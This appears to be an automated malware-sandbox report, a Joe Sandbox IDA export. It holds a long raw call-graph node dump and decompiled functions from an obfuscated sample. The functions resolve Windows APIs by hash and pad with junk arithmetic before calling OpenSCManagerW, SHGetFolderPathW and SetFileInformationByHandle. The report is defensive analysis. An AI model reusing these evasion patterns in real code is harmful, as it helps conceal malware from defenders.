GetPEB 4522->4523 4523->4520 4524->4518 4543 437c38 4525->4543 4526 440411 GetPEB 4526->4543 4528 438b27 4532 440411 GetPEB 4528->4532 4534 438881 4532->4534 4533 42ab66 2 API calls 4533->4543 4534->4159 4535 43886b 4644 440411 4535->4644 4536 4268de GetPEB 4536->4543 4540 42ae03 GetPEB 4540->4543 4541 42b6d1 GetPEB 4541->4543 4543->4526 4543->4528 4543->4533 4543->4534 4543->4535 4543->4536 4543->4540 4543->4541 4648 4284b8 4543->4648 4651 440349 4543->4651 4655 4275a5 4543->4655 4659 4300a0 4543->4659 4663 440867 4543->4663 4672 4390db 4543->4672 4676 43bd01 4543->4676 4546 43c9c7 4544->4546 4545 433512 2 API calls 4545->4546 4546->4545 4547 43d2a8 GetPEB 4546->4547 4548 43cc7f 4546->4548 4547->4546 4548->4486 4550 42bb61 4549->4550 4551 433512 2 API calls 4550->4551 4552 42bc13 4551->4552 4552->4500 4554 42f567 4553->4554 4555 42c1dc GetPEB 4554->4555 4556 42f587 4555->4556 4556->4500 4558 43fd44 4557->4558 4565 42c14b 4558->4565 4562 42f07c 4561->4562 4563 42c1dc GetPEB 4562->4563 4564 42f098 4563->4564 4564->4504 4566 42c167 4565->4566 4567 422d9f GetPEB 4566->4567 4568 42c1cc 4567->4568 4568->4500 4574 4345ee 4569->4574 4570 433512 2 API calls 4570->4574 4571 434b24 4572 4268de GetPEB 4571->4572 4575 434b0a 4572->4575 4573 42ad30 GetPEB 4573->4574 4574->4570 4574->4571 4574->4573 4574->4575 4575->4515 4577 43faaf 4576->4577 4578 43fd29 GetPEB 4577->4578 4579 43fb24 4578->4579 4579->4515 4582 431867 4580->4582 4583 43274a 4582->4583 4585 432620 4582->4585 4587 4268de GetPEB 4582->4587 4589 433512 2 API calls 4582->4589 4593 42ab66 RtlAllocateHeap GetPEB 4582->4593 4594 430eda GetPEB 4582->4594 4595 42ae03 GetPEB 4582->4595 4603 43fda3 4582->4603 4607 42e723 4582->4607 4611 42ba16 4582->4611 4615 433b45 4582->4615 4619 43fbcf 4582->4619 4583->4583 4590 427027 GetPEB 4585->4590 4587->4582 4589->4582 4592 432641 4590->4592 4592->4515 4593->4582 4594->4582 4595->4582 4599 43ff5b 4596->4599 4597 433512 2 API calls 4597->4599 4598 4401b7 4598->4515 4599->4597 4599->4598 4600 43f88f GetPEB 4599->4600 4601 44019f 4599->4601 4600->4599 4623 43f88f 4601->4623 4604 43fdc2 4603->4604 4605 422d9f GetPEB 4604->4605 4606 43fe4a 4605->4606 4606->4582 4608 42e739 4607->4608 4609 422d9f GetPEB 4608->4609 4610 42e7c2 4609->4610 4610->4582 4612 42ba38 4611->4612 4613 422d9f GetPEB 4612->4613 4614 42ba9c 4613->4614 4614->4582 4616 433b7a 4615->4616 4617 422d9f GetPEB 4616->4617 4618 433bff 4617->4618 4618->4582 4620 43fbf9 4619->4620 4621 422d9f GetPEB 4620->4621 4622 43fc7d 4621->4622 4622->4582 4624 43f8ab 4623->4624 4625 43fd29 GetPEB 4624->4625 4626 43f93a 4625->4626 4626->4598 4633 43cca8 4627->4633 4628 433512 2 API calls 4628->4633 4629 43d19b 4630 4268de GetPEB 4629->4630 4632 43d187 4630->4632 4631 42b335 GetPEB 4631->4633 4632->4518 4633->4628 4633->4629 4633->4631 4633->4632 4638 43650a 4634->4638 4635 43674a 4640 43d6c0 4635->4640 4636 431831 2 API calls 4636->4638 4638->4635 4638->4636 4639 436748 4638->4639 4639->4518 4641 43d6ef 4640->4641 4642 422d9f GetPEB 4641->4642 4643 43d753 4642->4643 4643->4639 4645 440427 4644->4645 4646 422d9f GetPEB 4645->4646 4647 4404d3 4646->4647 4647->4534 4680 42cf26 4648->4680 4652 440374 4651->4652 4653 422d9f GetPEB 4652->4653 4654 4403f7 4653->4654 4654->4543 4656 4275c4 4655->4656 4657 422d9f GetPEB 4656->4657 4658 427663 4657->4658 4658->4543 4660 4300d9 4659->4660 4661 422d9f GetPEB 4660->4661 4662 430170 4661->4662 4662->4543 4669 440b8b 4663->4669 4665 440cb5 4666 440cbd 4665->4666 4667 4268de GetPEB 4665->4667 4666->4543 4667->4666 4668 433512 RtlAllocateHeap GetPEB 4668->4669 4669->4665 4669->4668 4670 43fd29 GetPEB 4669->4670 4671 4268de GetPEB 4669->4671 4684 42840b 4669->4684 4670->4669 4671->4669 4673 4390fd 4672->4673 4674 422d9f GetPEB 4673->4674 4675 439176 4674->4675 4675->4543 4677 43bd24 4676->4677 4678 422d9f GetPEB 4677->4678 4679 43bd9e 4678->4679 4679->4543 4681 42cf4c 4680->4681 4682 422d9f GetPEB 4681->4682 4683 4285a6 4682->4683 4683->4543 4685 42842d 4684->4685 4686 422d9f GetPEB 4685->4686 4687 4284a4 4686->4687 4687->4669 4689 422d9f GetPEB 4688->4689 4690 42b247 4689->4690 4691 4285b6 4690->4691 4692 4285cf 4691->4692 4693 422d9f GetPEB 4692->4693 4694 428641 4693->4694 4694->4065 4696 434fbe 4695->4696 4697 422d9f GetPEB 4696->4697 4698 435035 4697->4698 4698->4178 4710 42f58f 4699->4710 4703 4419b4 4702->4703 4733 433c1b 4703->4733 4706 441b49 4706->4178 4709 434dad 2 API calls 4709->4706 4714 42f5ba 4710->4714 4713 42f866 4715 434dad 2 API calls 4713->4715 4714->4713 4716 42c78b 4714->4716 4719 440cf5 4714->4719 4722 43e3f7 4714->4722 4726 440296 4714->4726 4730 423c3b 4714->4730 4715->4716 4716->4178 4720 44074a GetPEB 4719->4720 4721 440d40 4720->4721 4721->4714 4723 43e40d 4722->4723 4724 422d9f GetPEB 4723->4724 4725 43e48a 4724->4725 4725->4714 4727 4402af 4726->4727 4728 422d9f GetPEB 4727->4728 4729 44033b 4728->4729 4729->4714 4731 422d9f GetPEB 4730->4731 4732 423cc3 4731->4732 4732->4714 4734 422d9f GetPEB 4733->4734 4735 433caa 4734->4735 4735->4706 4736 431785 4735->4736 4737 4317a6 4736->4737 4738 422d9f GetPEB 4737->4738 4739 43181e 4738->4739 4739->4709 4742 426bb0 4740->4742 4741 426c1e 4741->4185 4742->4741 4743 425e0b GetPEB 4742->4743 4744 4268de GetPEB 4742->4744 4746 434dad 2 API calls 4742->4746 4840 42f88a 4742->4840 4743->4742 4744->4742 4746->4742 4753 435318 4747->4753 4748 435410 4749 42f88a GetPEB 4748->4749 4750 43540e 4749->4750 4750->4185 4753->4748 4753->4750 4848 434eff 4753->4848 4852 438d71 4753->4852 4860 43e713 4753->4860 4766 43aad1 4755->4766 4756 42ea7b 2 API calls 4756->4766 4757 43acc8 4757->4185 4758 4412a8 GetPEB 4758->4766 4759 434fa8 GetPEB 4759->4766 4761 42ab66 RtlAllocateHeap GetPEB 4761->4766 4762 429700 3 API calls 4762->4766 4763 42e7ce GetPEB 4763->4766 4764 42ae03 GetPEB 4764->4766 4766->4756 4766->4757 4766->4758 4766->4759 4766->4761 4766->4762 4766->4763 4766->4764 4873 428650 4766->4873 4877 43c38f 4766->4877 4888 438fd2 4767->4888 4769 42ab66 RtlAllocateHeap GetPEB 4771 42537f 4769->4771 4770 4268de GetPEB 4770->4771 4771->4769 4771->4770 4773 429700 3 API calls 4771->4773 4775 42579e 4771->4775 4777 4412a8 GetPEB 4771->4777 4778 43ba68 GetPEB 4771->4778 4779 42ea7b 2 API calls 4771->4779 4780 42579c 4771->4780 4781 43c9a9 2 API calls 4771->4781 4782 434fa8 GetPEB 4771->4782 4784 428650 GetPEB 4771->4784 4785 42e7ce GetPEB 4771->4785 4786 42ae03 GetPEB 4771->4786 4787 43c38f 3 API calls 4771->4787 4891 425eb5 4771->4891 4895 42777b 4771->4895 4901 43d37b 4771->4901 4773->4771 4776 434dad 2 API calls 4775->4776 4776->4780 4777->4771 4778->4771 4779->4771 4780->4185 4781->4771 4782->4771 4784->4771 4785->4771 4786->4771 4787->4771 4804 4238b0 4788->4804 4789 423b5f 4790 429700 3 API calls 4789->4790 4793 423b9c 4790->4793 4791 423b37 4794 434dad 2 API calls 4791->4794 4792 423b32 4792->4185 4793->4792 4796 434dad 2 API calls 4793->4796 4794->4792 4795 42b186 GetPEB 4795->4804 4796->4791 4800 4412a8 GetPEB 4800->4804 4801 434fa8 GetPEB 4801->4804 4802 434dad CloseHandle GetPEB 4802->4804 4803 428650 GetPEB 4803->4804 4804->4789 4804->4791 4804->4792 4804->4795 4804->4800 4804->4801 4804->4802 4804->4803 4805 42ab66 2 API calls 4804->4805 4806 42e7ce GetPEB 4804->4806 4807 42ae03 GetPEB 4804->4807 4808 43c38f 3 API calls 4804->4808 4905 43363d 4804->4905 4915 429685 4804->4915 4918 42b41a 4804->4918 4805->4804 4806->4804 4807->4804 4808->4804 4820 428192 4809->4820 4810 42ea7b 2 API calls 4810->4820 4811 428397 4811->4185 4812 4412a8 GetPEB 4812->4820 4813 434fa8 GetPEB 4813->4820 4814 428650 GetPEB 4814->4820 4815 42ae03 GetPEB 4815->4820 4816 42ab66 RtlAllocateHeap GetPEB 4816->4820 4817 429700 3 API calls 4817->4820 4818 42e7ce GetPEB 4818->4820 4819 43c38f 3 API calls 4819->4820 4820->4810 4820->4811 4820->4812 4820->4813 4820->4814 4820->4815 4820->4816 4820->4817 4820->4818 4820->4819 4826 430c1d 4821->4826 4822 430d15 4823 42f88a GetPEB 4822->4823 4825 430d13 4823->4825 4824 438d71 GetPEB 4824->4826 4825->4185 4826->4822 4826->4824 4826->4825 4827 434eff GetPEB 4826->4827 4828 43e713 GetPEB 4826->4828 4827->4826 4828->4826 4837 428c4b 4829->4837 4830 429700 3 API calls 4830->4837 4831 428d8a 4831->4185 4832 4412a8 GetPEB 4832->4837 4833 434fa8 GetPEB 4833->4837 4834 428650 GetPEB 4834->4837 4835 42ab66 2 API calls 4835->4837 4836 42e7ce GetPEB 4836->4837 4837->4830 4837->4831 4837->4832 4837->4833 4837->4834 4837->4835 4837->4836 4838 42ae03 GetPEB 4837->4838 4839 43c38f 3 API calls 4837->4839 4838->4837 4839->4837 4841 42f89d 4840->4841 4844 425961 4841->4844 4845 42597e 4844->4845 4846 422d9f GetPEB 4845->4846 4847 4259f7 4846->4847 4847->4742 4849 434f24 4848->4849 4850 422d9f GetPEB 4849->4850 4851 434f95 4850->4851 4851->4753 4853 438d8c 4852->4853 4854 438fc8 4853->4854 4865 42b0da 4853->4865 4854->4753 4857 43fd29 GetPEB 4858 438f83 4857->4858 4858->4854 4859 43fd29 GetPEB 4858->4859 4859->4858 4863 43e72b 4860->4863 4861 43e875 4861->4753 4862 43f949 GetPEB 4862->4863 4863->4861 4863->4862 4869 43d20a 4863->4869 4866 42b0f7 4865->4866 4867 422d9f GetPEB 4866->4867 4868 42b172 4867->4868 4868->4854 4868->4857 4870 43d220 4869->4870 4871 422d9f GetPEB 4870->4871 4872 43d29a 4871->4872 4872->4863 4874 428664 4873->4874 4875 425ae2 GetPEB 4874->4875 4876 428710 4875->4876 4876->4766 4881 43c3a8 4877->4881 4878 43c64b 4880 434dad 2 API calls 4878->4880 4879 43c649 4879->4766 4880->4879 4881->4878 4881->4879 4883 43e938 2 API calls 4881->4883 4884 42eeb8 4881->4884 4883->4881 4885 42eed9 4884->4885 4886 422d9f GetPEB 4885->4886 4887 42ef5a 4886->4887 4887->4881 4889 422d9f GetPEB 4888->4889 4890 43903c 4889->4890 4890->4771 4892 425ee9 4891->4892 4893 422d9f GetPEB 4892->4893 4894 425f68 4893->4894 4894->4771 4899 4277a8 4895->4899 4896 427a1d 4897 43f88f GetPEB 4896->4897 4898 427a1b 4897->4898 4898->4771 4899->4896 4899->4898 4900 433512 2 API calls 4899->4900 4900->4899 4902 43d3a0 4901->4902 4903 42c1dc GetPEB 4902->4903 4904 43d3c0 4903->4904 4904->4771 4914 43367d 4905->4914 4906 441310 GetPEB 4906->4914 4907 433b1e 4934 426e34 4907->4934 4910 42ab66 2 API calls 4910->4914 4911 433b1c 4911->4804 4913 42ae03 GetPEB 4913->4914 4914->4906 4914->4907 4914->4910 4914->4911 4914->4913 4926 435b0e 4914->4926 4930 43c8bd 4914->4930 4916 422d9f GetPEB 4915->4916 4917 4296f7 4916->4917 4917->4804 4925 42b43c 4918->4925 4921 42b615 4923 434dad 2 API calls 4921->4923 4922 429685 GetPEB 4922->4925 4924 42b62e 4923->4924 4924->4804 4925->4921 4925->4922 4925->4924 4938 4413b1 4925->4938 4942 43fb2b 4925->4942 4927 435b28 4926->4927 4928 422d9f GetPEB 4927->4928 4929 435ba3 4928->4929 4929->4914 4931 43c8fa 4930->4931 4932 422d9f GetPEB 4931->4932 4933 43c986 4932->4933 4933->4914 4935 426e4a 4934->4935 4936 422d9f GetPEB 4935->4936 4937 426ecb 4936->4937 4937->4911 4939 4413db 4938->4939 4940 422d9f GetPEB 4939->4940 4941 441455 4940->4941 4941->4925 4943 43fb44 4942->4943 4944 422d9f GetPEB 4943->4944 4945 43fbc1 4944->4945 4945->4925 4947 4287b5 4946->4947 4948 422d9f GetPEB 4947->4948 4949 42882f 4948->4949 4949->4204 4951 43c2fa 4950->4951 4952 422d9f GetPEB 4951->4952 4953 43c375 4952->4953 4953->4204 4955 427b0e 4954->4955 4956 422d9f GetPEB 4955->4956 4957 427b76 4956->4957 4957->4201 4969 421973 4958->4969 4959 423bf8 GetPEB 4959->4969 4961 421f7e 4978 438c35 4961->4978 4962 42ae03 GetPEB 4962->4969 4965 42ab66 RtlAllocateHeap GetPEB 4965->4969 4966 421f7c 4966->4212 4967 42e7ce GetPEB 4967->4969 4968 421950 2 API calls 4968->4969 4969->4959 4969->4961 4969->4962 4969->4965 4969->4966 4969->4967 4969->4968 4970 43f7fc 4969->4970 4974 43baea 4969->4974 4971 43f812 4970->4971 4972 422d9f GetPEB 4971->4972 4973 43f881 4972->4973 4973->4969 4975 43bb04 4974->4975 4976 422d9f GetPEB 4975->4976 4977 43bba3 4976->4977 4977->4969 4979 438c4e 4978->4979 4980 422d9f GetPEB 4979->4980 4981 438ccb 4980->4981 4981->4966 4983 423da3 4982->4983 4984 422d9f GetPEB 4983->4984 4985 423e1f 4984->4985 4985->4228 4987 435a75 4986->4987 4988 422d9f GetPEB 4987->4988 4989 435b03 4988->4989 4989->4228 4991 43a17e 4990->4991 4992 43a3cc 4991->4992 4995 43a3ca 4991->4995 5002 433f73 4991->5002 4993 42bb4b 2 API calls 4992->4993 4994 43a3e2 4993->4994 5006 42f154 4994->5006 4995->4232 5001 42ae03 GetPEB 5001->4995 5003 433f89 5002->5003 5004 422d9f GetPEB 5003->5004 5005 434007 5004->5005 5005->4991 5015 425c03 5006->5015 5010 42f2b6 5011 43d1c1 5010->5011 5012 43d1e5 5011->5012 5013 42c1dc GetPEB 5012->5013 5014 43a409 5013->5014 5014->5001 5016 425c1d 5015->5016 5017 422d9f GetPEB 5016->5017 5018 425c8b 5017->5018 5018->5010 5019 42884a 5018->5019 5020 428877 5019->5020 5021 422d9f GetPEB 5020->5021 5022 4288de 5021->5022 5022->5010 5032 4410a9 5023->5032 5024 42ab66 2 API calls 5024->5032 5025 433512 2 API calls 5025->5032 5026 43bdb5 GetPEB 5026->5032 5027 441287 5027->4244 5028 44126e 5031 4268de GetPEB 5028->5031 5030 42ae03 GetPEB 5030->5032 5031->5027 5032->5024 5032->5025 5032->5026 5032->5027 5032->5028 5032->5030 5041 43eae6 5032->5041 5034 43ee25 5033->5034 5045 430d33 5034->5045 5038 426e11 5037->5038 5039 426e2f 5037->5039 5038->5039 5040 4268de GetPEB 5038->5040 5039->4244 5040->5038 5042 43eb05 5041->5042 5043 433512 2 API calls 5042->5043 5044 43ebb1 5043->5044 5044->5032 5044->5044 5046 430d4d 5045->5046 5049 430ead 5046->5049 5052 430eab 5046->5052 5053 433512 2 API calls 5046->5053 5054 43acd3 5046->5054 5064 443672 5046->5064 5069 429a7d 5046->5069 5051 4268de GetPEB 5049->5051 5051->5052 5052->4244 5053->5046 5057 43b1d7 5054->5057 5056 43b1ff 5059 427027 GetPEB 5056->5059 5057->5056 5058 43b38c 5057->5058 5061 42ab66 RtlAllocateHeap GetPEB 5057->5061 5062 430eda GetPEB 5057->5062 5063 42ae03 GetPEB 5057->5063 5086 43f9e2 5057->5086 5058->5058 5060 43b220 5059->5060 5060->5046 5061->5057 5062->5057 5063->5057 5090 43e884 5064->5090 5067 4268de GetPEB 5068 443775 5067->5068 5068->5046 5080 42a69f 5069->5080 5071 42ab36 5074 427027 GetPEB 5071->5074 5073 434e64 GetPEB 5073->5080 5077 42ab34 5074->5077 5077->5046 5078 42ab66 RtlAllocateHeap GetPEB 5078->5080 5079 430eda GetPEB 5079->5080 5080->5071 5080->5073 5080->5077 5080->5078 5080->5079 5081 43e884 GetPEB 5080->5081 5083 43fd29 GetPEB 5080->5083 5084 43f9e2 GetPEB 5080->5084 5085 42ae03 GetPEB 5080->5085 5094 43d76f 5080->5094 5098 425fe2 5080->5098 5102 423e2a 5080->5102 5106 42cfce 5080->5106 5121 42f0a0 5080->5121 5081->5080 5083->5080 5084->5080 5085->5080 5087 43fa0f 5086->5087 5088 422d9f GetPEB 5087->5088 5089 43fa7d 5088->5089 5089->5057 5091 43e897 5090->5091 5092 422d9f GetPEB 5091->5092 5093 43e92c 5092->5093 5093->5067 5095 43d785 5094->5095 5096 422d9f GetPEB 5095->5096 5097 43d7fe 5096->5097 5097->5080 5099 426004 5098->5099 5100 422d9f GetPEB 5099->5100 5101 426070 5100->5101 5101->5080 5103 423e5a 5102->5103 5104 422d9f GetPEB 5103->5104 5105 423ee1 5104->5105 5105->5080 5118 42dd8e 5106->5118 5107 42ab66 RtlAllocateHeap GetPEB 5107->5118 5108 42e107 5110 427027 GetPEB 5108->5110 5109 42e23e 5109->5109 5114 42e125 5110->5114 5112 4268de GetPEB 5112->5118 5113 43fbcf GetPEB 5113->5118 5114->5080 5115 433512 2 API calls 5115->5118 5116 430eda GetPEB 5116->5118 5117 43ba68 GetPEB 5117->5118 5118->5107 5118->5108 5118->5109 5118->5112 5118->5113 5118->5115 5118->5116 5118->5117 5120 42ae03 GetPEB 5118->5120 5125 425c98 5118->5125 5129 434016 5118->5129 5120->5118 5122 42f0bc 5121->5122 5123 422d9f GetPEB 5122->5123 5124 42f13f 5123->5124 5124->5080 5126 425cc3 5125->5126 5127 422d9f GetPEB 5126->5127 5128 425d47 5127->5128 5128->5118 5130 43404d 5129->5130 5131 422d9f GetPEB 5130->5131 5132 4340d3 5131->5132 5132->5118 5134 42c693 5133->5134 5135 422d9f GetPEB 5134->5135 5136 42c6fb 5135->5136 5136->4247 5138 431215 5137->5138 5139 422d9f GetPEB 5138->5139 5140 43128e 5139->5140 5140->4275 5142 425b7e 5141->5142 5143 422d9f GetPEB 5142->5143 5144 4243d9 5143->5144 5144->4055 5148 424522 5145->5148 5147 424704 5165 439045 5147->5165 5148->5147 5150 441310 GetPEB 5148->5150 5151 424702 5148->5151 5161 42ac8c 5148->5161 5150->5148 5151->4286 5153 43448f 5152->5153 5155 4345a5 5153->5155 5157 42ab66 2 API calls 5153->5157 5158 4345a3 5153->5158 5159 428786 GetPEB 5153->5159 5160 42ae03 GetPEB 5153->5160 5169 42efa6 5153->5169 5156 427af8 GetPEB 5155->5156 5156->5158 5157->5153 5158->4286 5159->5153 5160->5153 5162 42aca9 5161->5162 5163 422d9f GetPEB 5162->5163 5164 42ad23 5163->5164 5164->5148 5166 439062 5165->5166 5167 422d9f GetPEB 5166->5167 5168 4390c7 5167->5168 5168->5151 5170 42efbf 5169->5170 5171 422d9f GetPEB 5170->5171 5172 42f051 5171->5172 5172->5153

                                                                                                                      Executed Functions

                                                                                                                      Function 0042EA7B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 462 42ea7b-42eb35 call 42cf25 call 422d9f SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E0042EA7B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t41;
				intOrPtr* _t50;
				void* _t51;
				signed int _t52;
				signed int _t53;
				void* _t60;

				_t60 = __edx;
				E0042CF25(_t41);
				_v16 = 0xd33285;
				_v16 = _v16 + 0xd9cb;
				_v16 = _v16 | 0xd94823ae;
				_v16 = _v16 ^ 0xd9d95ea2;
				_v8 = 0xf9f040;
				_v8 = _v8 ^ 0x026675a4;
				_t52 = 0x46;
				_v8 = _v8 / _t52;
				_t53 = 0x2b;
				_v8 = _v8 / _t53;
				_v8 = _v8 ^ 0x000f054e;
				_v12 = 0x255c2b;
				_v12 = _v12 ^ 0x0b9b7933;
				_v12 = _v12 + 0xffff1ebc;
				_v12 = _v12 ^ 0x0bb758ac;
				_t50 = E00422D9F(0x111af765, 0x1c, _t53, 0xe4d0349b);
				_t51 =  *_t50(0, _a8, 0, 0, _t60, 0, __edx, _a4, _a8, 0, _a16, _a20, _a24, 0); // executed
				return _t51;
			}












                                                                                                                      0x0042ea85
                                                                                                                      0x0042ea9a
                                                                                                                      0x0042ea9f
                                                                                                                      0x0042eaa9
                                                                                                                      0x0042eab2
                                                                                                                      0x0042eab9
                                                                                                                      0x0042eac0
                                                                                                                      0x0042eac7
                                                                                                                      0x0042ead3
                                                                                                                      0x0042ead8
                                                                                                                      0x0042eae0
                                                                                                                      0x0042eae8
                                                                                                                      0x0042eaeb
                                                                                                                      0x0042eaf2
                                                                                                                      0x0042eaf9
                                                                                                                      0x0042eb00
                                                                                                                      0x0042eb07
                                                                                                                      0x0042eb1f
                                                                                                                      0x0042eb2e
                                                                                                                      0x0042eb35

                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,D9D95EA2,00000000,00000000,?), ref: 0042EB2E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: +\%
                                                                                                                      • API String ID: 1514166925-2522068492
                                                                                                                      • Opcode ID: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction ID: fbbe7d7127f79ed6c7a0e0ff77926a1c5375bf139932a654a85d58304ae35bef
                                                                                                                      • Opcode Fuzzy Hash: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction Fuzzy Hash: 6B119732E00208BBDB14DEE6DA4A8DFBFB5EB85314F108099F504A6250E7754B60AF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0042EB36 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 467 42eb36-42ebf1 call 42cf25 call 422d9f OpenSCManagerW
                                                                                                                      C-Code - Quality: 68%
                                                                                                                      			E0042EB36(void* __ecx, intOrPtr _a4, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t40;
				void* _t52;
				signed int _t54;
				signed int _t55;

				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E0042CF25(_t40);
				_v32 = 0xf43dc;
				asm("stosd");
				asm("stosd");
				_t54 = 0x7c;
				asm("stosd");
				_v12 = 0x784be4;
				_t6 =  &_v12; // 0x784be4
				_t55 = 0x36;
				_v12 =  *_t6 / _t54;
				_v12 = _v12 + 0x9f6a;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x004694cb;
				_v8 = 0x884396;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x1535ea2d;
				_v8 = _v8 | 0xb4c8309a;
				_v8 = _v8 ^ 0xb7dc5be9;
				_v16 = 0x9578bf;
				_v16 = _v16 / _t55;
				_v16 = _v16 ^ 0x000e2a9d;
				E00422D9F(0xcb6a962, 0x1f4, _t55, 0x1b74c9e2);
				_t52 = OpenSCManagerW(0, 0, _a12); // executed
				return _t52;
			}












                                                                                                                      0x0042eb3e
                                                                                                                      0x0042eb43
                                                                                                                      0x0042eb44
                                                                                                                      0x0042eb47
                                                                                                                      0x0042eb49
                                                                                                                      0x0042eb4e
                                                                                                                      0x0042eb5d
                                                                                                                      0x0042eb62
                                                                                                                      0x0042eb63
                                                                                                                      0x0042eb66
                                                                                                                      0x0042eb67
                                                                                                                      0x0042eb6e
                                                                                                                      0x0042eb73
                                                                                                                      0x0042eb74
                                                                                                                      0x0042eb79
                                                                                                                      0x0042eb94
                                                                                                                      0x0042eb97
                                                                                                                      0x0042eb9e
                                                                                                                      0x0042eba5
                                                                                                                      0x0042eba9
                                                                                                                      0x0042ebb0
                                                                                                                      0x0042ebb7
                                                                                                                      0x0042ebbe
                                                                                                                      0x0042ebca
                                                                                                                      0x0042ebcd
                                                                                                                      0x0042ebdd
                                                                                                                      0x0042ebea
                                                                                                                      0x0042ebf1

                                                                                                                      APIs
                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 0042EBEA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ManagerOpen
                                                                                                                      • String ID: Kx
                                                                                                                      • API String ID: 1889721586-2841836380
                                                                                                                      • Opcode ID: 41dff3092bc1f63532a7cccec9612a866476fb4b2cab239042f705f6c49823a2
                                                                                                                      • Instruction ID: ff4abcf4425d56fdbd9c949639d4090d151f0d36fa2e26d1b82aedb37fe75a33
                                                                                                                      • Opcode Fuzzy Hash: 41dff3092bc1f63532a7cccec9612a866476fb4b2cab239042f705f6c49823a2
                                                                                                                      • Instruction Fuzzy Hash: A3115671E05208FBDB04EFA6D84A9DEBFB5EF44314F108099E504A6250D7B95B14CB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00425D65 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E00425D65(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t31;
				intOrPtr* _t38;
				void* _t39;
				void* _t42;

				_t42 = __edx;
				E0042CF25(_t31);
				_v12 = 0x1c122d;
				_v12 = _v12 * 0x6a;
				_v12 = _v12 ^ 0xecdd50d1;
				_v12 = _v12 ^ 0xe74257e3;
				_v16 = 0xd55139;
				_v16 = _v16 + 0xd07c;
				_v16 = _v16 ^ 0x00d6881e;
				_v8 = 0x156dc9;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x03beef10;
				_v8 = _v8 + 0xffffe13f;
				_v8 = _v8 ^ 0x06271f08;
				_t38 = E00422D9F(0x4ef88dcb, 0x31, __ecx, 0xa62ab78c);
				_t39 =  *_t38(_t42, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
				return _t39;
			}










                                                                                                                      0x00425d6f
                                                                                                                      0x00425d82
                                                                                                                      0x00425d87
                                                                                                                      0x00425d9b
                                                                                                                      0x00425d9e
                                                                                                                      0x00425da5
                                                                                                                      0x00425dac
                                                                                                                      0x00425db3
                                                                                                                      0x00425dba
                                                                                                                      0x00425dc1
                                                                                                                      0x00425dd3
                                                                                                                      0x00425dd6
                                                                                                                      0x00425ddd
                                                                                                                      0x00425de4
                                                                                                                      0x00425df4
                                                                                                                      0x00425e04
                                                                                                                      0x00425e0a

                                                                                                                      APIs
                                                                                                                      • SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 00425E04
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileHandleInformation
                                                                                                                      • String ID: WB
                                                                                                                      • API String ID: 3935143524-2158411504
